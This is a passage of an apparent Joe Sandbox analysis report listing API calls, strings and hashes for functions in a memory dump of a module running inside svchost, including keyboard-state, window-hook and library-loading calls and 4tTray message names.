                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E34521
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3452E
                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3453A
                                                                                                                                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 03E3456E
                                                                                                                                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 03E3457A
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 03E345A3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                    • Opcode ID: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction ID: 79fb2d045b02c34a9733473fbc26895133d7b1ae652e99dd2bffa1bba0448f8c
                                                                                                                                                                    • Opcode Fuzzy Hash: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A513A71D00259AFDF11EBE9CC88AEEB7F8AF46204F0516A5E155EB280D7749E40CF60
                                                                                                                                                                    Function 03E38D00 Relevance: 3.0, APIs: 2, Instructions: 30keyboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyState.USER32(0000000D), ref: 03E38D13
                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 03E38D1F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: State$Keyboard
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4200833460-0
                                                                                                                                                                    • Opcode ID: 10124a877c90994702e99e21121a370988b718aec09e7bc4732486b202dd817c
                                                                                                                                                                    • Instruction ID: 443cde33f3e83ad8f5091749e51aed7f1244a339b1eae403a53a3c500e3e9a20
                                                                                                                                                                    • Opcode Fuzzy Hash: 10124a877c90994702e99e21121a370988b718aec09e7bc4732486b202dd817c
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF01D0185C3DD55DB31C2B9480C7BDFEB80B17128F8C53C9DCE4292D6D6714659E655
                                                                                                                                                                    Function 03E3A4B6 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 03E3A4CC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                    • Opcode ID: 1d25acefea867c6e53664f48da86dc6e832dcf2838eaf4eb70014331d8bb15e6
                                                                                                                                                                    • Instruction ID: d2f7704a85a84a94c936209acdd25ef7ca454d7f4b34c227c153c3e2907e7a9e
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d25acefea867c6e53664f48da86dc6e832dcf2838eaf4eb70014331d8bb15e6
                                                                                                                                                                    • Instruction Fuzzy Hash: 8DD06CB660420CBF8B40DEDDE980E9A77ECEB0D210B108415BA08DB240D631EE109B64
                                                                                                                                                                    Function 03E3A4B8 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 03E3A4CC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                    • Opcode ID: 95ed39734bbca9339797dc30844f7ba5c8f620de155cd7b31576d4b628929270
                                                                                                                                                                    • Instruction ID: 3d01a3efdd07784b5c48eea529cbe38221295ce8d6a63055e9296ddb8460fe80
                                                                                                                                                                    • Opcode Fuzzy Hash: 95ed39734bbca9339797dc30844f7ba5c8f620de155cd7b31576d4b628929270
                                                                                                                                                                    • Instruction Fuzzy Hash: 44D06CB660420CBF8B40DEDDE980E8A77ECAB0D210B108405BA08DB240D631EE109B64
                                                                                                                                                                    Function 03E39304 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 27registryclipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_POSCHANGED), ref: 03E39315
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_INIT_POS), ref: 03E39324
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_ROLLUP), ref: 03E39333
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_FREEMEMORY_NAME), ref: 03E39342
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_STAYONTOP), ref: 03E39351
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessAttached), ref: 03E39360
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessDetached), ref: 03E3936F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                                                                    • String ID: 4tTray_ProcessAttached$4tTray_ProcessDetached$4tTray_WM_FREEMEMORY_NAME$4tTray_WM_INIT_POS$4tTray_WM_POSCHANGED$4tTray_WM_ROLLUP$4tTray_WM_STAYONTOP
                                                                                                                                                                    • API String ID: 1228543026-747308701
                                                                                                                                                                    • Opcode ID: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction ID: 96a4dfdd5ec575b13a92e2223505367f1777117eb1bf4c02878bcc88f158423e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 57F014B85403A89ED700FBB7784E6B936E4E7427117093359B5249B2A6D7B27800CF1A
                                                                                                                                                                    Function 03E37E9C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,03E38167,?,?,00000000,00000000), ref: 03E37ED2
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                    • Opcode ID: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction ID: ba6000db4c7e16c4790a8672612dfc45fe4da85a2aff895d6063b791e824576b
                                                                                                                                                                    • Opcode Fuzzy Hash: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction Fuzzy Hash: E8611F3870034CABDB00FBB4DC89AAF77B6EB8A200F60B665E1119F345DA35D909D755
                                                                                                                                                                    Function 03E39C74 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                    • GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                    • GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                    • String ID: GetProcAddress$kernel32.dll$user32.dll
                                                                                                                                                                    • API String ID: 2574300362-2524697592
                                                                                                                                                                    • Opcode ID: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction ID: da4c9419a5ae2107a451a669a20ea18d98bcf1a671636ba59f743b4483bbd4c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 47113C7490125CDFDB11FBA6D58D79CBBF4AB06704F9423D4E840A7245D3B4A941CF42
                                                                                                                                                                    Function 03E33B44 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21,03E3B330), ref: 03E33B7D
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21), ref: 03E33B83
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?), ref: 03E33B98
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E), ref: 03E33B9E
                                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 03E33BBC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                    • Opcode ID: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction ID: 9bca6b6c119a3b56df426a33920d23ece6d2af7782d8e3ad63d3f085f783bf2d
                                                                                                                                                                    • Opcode Fuzzy Hash: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction Fuzzy Hash: B3F09664A8839879E630F2655E0EFDA267C5747F14F246309B2247C0CAC7B4C484CA65
                                                                                                                                                                    Function 03E3A600 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E3A63D
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E3A655
                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 03E3A6B8
                                                                                                                                                                    • PostMessageA.USER32(?,0000001F,00000000,00000000), ref: 03E3A882
                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,?,000000F0,00000000,03E3A8FF,?,00000000,?,?,?,00000000,03E3A938), ref: 03E3A8AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext$LongMenuMessagePostSystemWindow
                                                                                                                                                                    • String ID: CabinetWClass
                                                                                                                                                                    • API String ID: 776588294-1981833947
                                                                                                                                                                    • Opcode ID: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction ID: 3c25c4954bbc90a7ffa1de2d6ebd178998cbca19f7419208a38add636fbaacf0
                                                                                                                                                                    • Opcode Fuzzy Hash: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction Fuzzy Hash: CFA1B039A00309EFDB14DF58D889EA9B7F5EF0A314F1596A0E985AB761C730E981CB10
                                                                                                                                                                    Function 03E3A36C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF), ref: 03E3A38F
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000,000000FF,000000FF), ref: 03E3A395
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentSizeWorking
                                                                                                                                                                    • String ID: WM_CLOAK$WM_UNCLOAK
                                                                                                                                                                    • API String ID: 2122760700-2187480440
                                                                                                                                                                    • Opcode ID: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction ID: df02de288312bcef67ff7f9362bd9a113ec0bd6e7d4838c2643eb3b62c702b36
                                                                                                                                                                    • Opcode Fuzzy Hash: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4421CC38604248DFCB10EB59D48DD5CB7F1AF0A314F65A7A1E852AB3A1D731ED81DB11
                                                                                                                                                                    Function 03E37198 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E37000: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                      • Part of subcall function 03E37000: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 03E371CF
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 03E371EC
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E371F2
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E37207
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E3720D
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 03E3722F
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 03E37245
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                    • Opcode ID: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction ID: 3c1523f4629d0984b433b4ae6d96438be50c8988c71521e05429f151a3e9ebdc
                                                                                                                                                                    • Opcode Fuzzy Hash: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction Fuzzy Hash: EB115EBA108304AED300F7A6CC89F9F77EC6B46600F402715B354EB0D1DA31E904CB62
                                                                                                                                                                    Function 03E38904 Relevance: 10.5, APIs: 7, Instructions: 38threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 03E3890F
                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 03E38915
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E38923
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,000000FF), ref: 03E38929
                                                                                                                                                                    • SetFocus.USER32(?,00000000,03E3896A,?,00000000,?,000000FF), ref: 03E38940
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E3895E
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,03E38971,03E3896A,?,00000000,?,000000FF), ref: 03E38964
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Thread$AttachCurrentInputWindow$FocusForegroundProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 440050021-0
                                                                                                                                                                    • Opcode ID: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction ID: f37236d34e7aade5542e2b6c436e5c32141005d5a9f8255d9afe1cd80713c6fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction Fuzzy Hash: C2F01279E04344BEDB11EBF68C1996E77ACDB4A620F525660B520EB5C0D6359910CA11
                                                                                                                                                                    Function 03E398F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 03E398FD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SwitchToThisWindow), ref: 03E39914
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 03E39927
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: ChangeWindowMessageFilter$SwitchToThisWindow$user32.dll
                                                                                                                                                                    • API String ID: 667068680-2021927898
                                                                                                                                                                    • Opcode ID: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction ID: c147dba891d3fd90cba0090a9a5d85f2cc44bd22ff7f8da3b8010a8c055991db
                                                                                                                                                                    • Opcode Fuzzy Hash: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF01CB2905308EEDB00FFBBA94D69A77F8DB01514B141695E0189B251E7B06900CB10
                                                                                                                                                                    Function 03E31ABC Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(Function_0000D5C4,00000000,03E31BB0), ref: 03E31AEB
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,03E31BB0), ref: 03E31AFD
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B21
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B72
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BA0
                                                                                                                                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BAA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
